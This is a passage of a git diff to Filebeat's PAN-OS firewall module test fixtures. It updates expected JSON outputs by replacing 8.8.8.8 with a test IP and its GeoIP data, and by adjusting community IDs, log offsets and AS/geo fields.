@@ -8963,12 +8853,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "57869", - "panw.panos.network.nat.community_id": "1:gXS9tqyuBg6/0KzAEU4EdHyNAoI=", + "panw.panos.network.nat.community_id": "1:PPL6I8dFeEQFMg7LaefQPo4mg7E=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825820, "panw.panos.source.interface": "ethernet1/3", @@ -8984,13 +8874,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -9015,17 +8905,18 @@ "client.nat.port": 56717, "client.packets": 1, "client.port": 50703, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -9039,7 +8930,7 @@ "event.end": "2020-03-27T09:57:21.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:21.000+01:00", "event.timezone": "+01:00", @@ -9051,12 +8942,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 43918, + "log.offset": 44148, "network.application": "dns", "network.bytes": 109, "network.community_id": [ - "1:9a22qc6VhZd089dxhMqfXDdYpNo=", - "1:WCrMnjZ+dihWiI8rv04hcCKbIy8=" + "1:JygoKpjgMjJEmth8VG1ojrwEEhk=", + "1:mIodWBA25yfAsnsj6sayls9qjO4=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -9073,12 +8964,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "6893", - "panw.panos.network.nat.community_id": "1:WCrMnjZ+dihWiI8rv04hcCKbIy8=", + "panw.panos.network.nat.community_id": "1:mIodWBA25yfAsnsj6sayls9qjO4=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825821, "panw.panos.source.interface": "ethernet1/3", @@ -9094,13 +8985,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -9125,17 +9016,18 @@ "client.nat.port": 39698, "client.packets": 1, "client.port": 44390, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -9149,7 +9041,7 @@ "event.end": "2020-03-27T09:56:50.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:56:50.000+01:00", "event.timezone": "+01:00", @@ -9161,12 +9053,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 44421, + "log.offset": 44661, "network.application": "dns", "network.bytes": 205, "network.community_id": [ - "1:/8/NBiUHojwG7Xg0G7kYyPaXr8g=", - "1:Vd+4wF3BBhfIti3Ac78v09oGnBA=" + "1:IpJBYF4oeLKy69S1bLD1GhfWDQ8=", + "1:Ox5H5tQQWEuS4PS7D8FAEp7Xf8o=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -9183,12 +9075,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "7565", - "panw.panos.network.nat.community_id": "1:/8/NBiUHojwG7Xg0G7kYyPaXr8g=", + "panw.panos.network.nat.community_id": "1:IpJBYF4oeLKy69S1bLD1GhfWDQ8=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825811, "panw.panos.source.interface": "ethernet1/3", @@ -9204,13 +9096,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -9236,14 +9128,7 @@ "client.packets": 1, "client.port": 62393, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 124, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 53, @@ -9271,7 +9156,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 44928, + "log.offset": 45178, "network.application": "dns", "network.bytes": 216, "network.community_id": [ 
@@ -9374,7 +9259,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 45449, + "log.offset": 45699, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -9447,17 +9332,18 @@ "client.nat.port": 8498, "client.packets": 1, "client.port": 52595, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 155, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -9471,7 +9357,7 @@ "event.end": "2020-03-27T09:56:50.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:56:50.000+01:00", "event.timezone": "+01:00", @@ -9483,12 +9369,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 45956, + "log.offset": 46206, "network.application": "dns", "network.bytes": 235, "network.community_id": [ - "1:cX/sAZ7/pEvR5+ZeVFubai/NmiU=", - "1:uM00i55bZAvnhupXoR1sjCdrx3M=" + "1:8uxquscQTDaGKBDuinM2I4JNk9E=", + "1:U2Se6kg62Kqdn8xxw6AZ/ldQ+NQ=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -9505,12 +9391,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6640", - "panw.panos.network.nat.community_id": "1:uM00i55bZAvnhupXoR1sjCdrx3M=", + "panw.panos.network.nat.community_id": "1:U2Se6kg62Kqdn8xxw6AZ/ldQ+NQ=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825812, "panw.panos.source.interface": "ethernet1/3", @@ -9526,13 +9412,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 155, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -9586,7 +9472,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 46462, + "log.offset": 46722, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -9689,7 +9575,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 46967, + "log.offset": 47227, "network.application": "web-browsing", "network.bytes": 4691, "network.community_id": [ @@ -9792,7 +9678,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 47487, + "log.offset": 47747, "network.application": "google-base", "network.bytes": 4691, "network.community_id": [ 
@@ -9866,14 +9752,7 @@ "client.packets": 1, "client.port": 61558, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 53, @@ -9901,7 +9780,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 48029, + "log.offset": 48289, "network.application": "dns", "network.bytes": 88, "network.community_id": [ @@ -9976,14 +9855,7 @@ "client.packets": 1, "client.port": 54614, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 666, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 443, @@ -10011,7 +9883,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 48544, + "log.offset": 48804, "network.application": "dnscrypt", "network.bytes": 904, "network.community_id": [ @@ -10114,7 +9986,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 49069, + "log.offset": 49329, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ 
@@ -10216,7 +10088,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 49572, + "log.offset": 49832, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ @@ -10289,17 +10161,18 @@ "client.nat.port": 5019, "client.packets": 1, "client.port": 59479, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -10313,7 +10186,7 @@ "event.end": "2020-03-27T09:57:17.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:17.000+01:00", "event.timezone": "+01:00", @@ -10325,12 +10198,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 50075, + "log.offset": 50335, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:034cmEuUmzrfPtJNEB6qtgQkEM4=", - "1:tiZQiOsx7Hl1UTep1NIb5ys9EJI=" + "1:IcyfqNRJP4lRPAgYf/GBfJYVtKo=", + "1:gD+AdfVnQqmW3No4E/rSQdfNuf0=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -10347,12 +10220,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "47300", - "panw.panos.network.nat.community_id": "1:034cmEuUmzrfPtJNEB6qtgQkEM4=", + "panw.panos.network.nat.community_id": "1:gD+AdfVnQqmW3No4E/rSQdfNuf0=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825802, "panw.panos.source.interface": "ethernet1/3", @@ -10368,13 +10241,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -10428,7 +10301,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 50576, + "log.offset": 50846, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ @@ -10531,7 +10404,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 51077, + "log.offset": 51347, "network.application": "google-base", "network.bytes": 7126, "network.community_id": [ diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json index f6953af5ad7d..4b1410f4d87a 100644 --- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json 
@@ -6,13 +6,6 @@ "client.nat.port": 37679, "client.port": 52984, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -111,13 +104,6 @@ "client.nat.port": 28249, "client.port": 52983, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -216,13 +202,6 @@ "client.nat.port": 63898, "client.port": 52986, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", 
@@ -321,13 +300,6 @@ "client.nat.port": 7515, "client.port": 52985, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -426,13 +398,6 @@ "client.nat.port": 3225, "client.port": 52987, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -531,13 +496,6 @@ "client.nat.port": 60449, "client.port": 52988, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", 
@@ -636,13 +594,6 @@ "client.nat.port": 60559, "client.port": 52990, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -741,13 +692,6 @@ "client.nat.port": 47414, "client.port": 52989, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", @@ -846,13 +790,6 @@ "client.nat.port": 37673, "client.port": 52992, "destination.address": "152.195.55.192", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "152.195.55.192", "destination.nat.ip": "152.195.55.192", 
@@ -951,13 +888,6 @@
 "client.nat.port": 8232,
 "client.port": 52991,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1056,13 +986,6 @@
 "client.nat.port": 32982,
 "client.port": 52994,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1161,13 +1084,6 @@
 "client.nat.port": 10473,
 "client.port": 52993,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1266,13 +1182,6 @@
 "client.nat.port": 20446,
 "client.port": 52995,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1371,13 +1280,6 @@
 "client.nat.port": 34699,
 "client.port": 52996,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1476,13 +1378,6 @@
 "client.nat.port": 22820,
 "client.port": 52997,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1581,13 +1476,6 @@
 "client.nat.port": 41060,
 "client.port": 52998,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1686,13 +1574,6 @@
 "client.nat.port": 9058,
 "client.port": 52999,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1791,13 +1672,6 @@
 "client.nat.port": 54846,
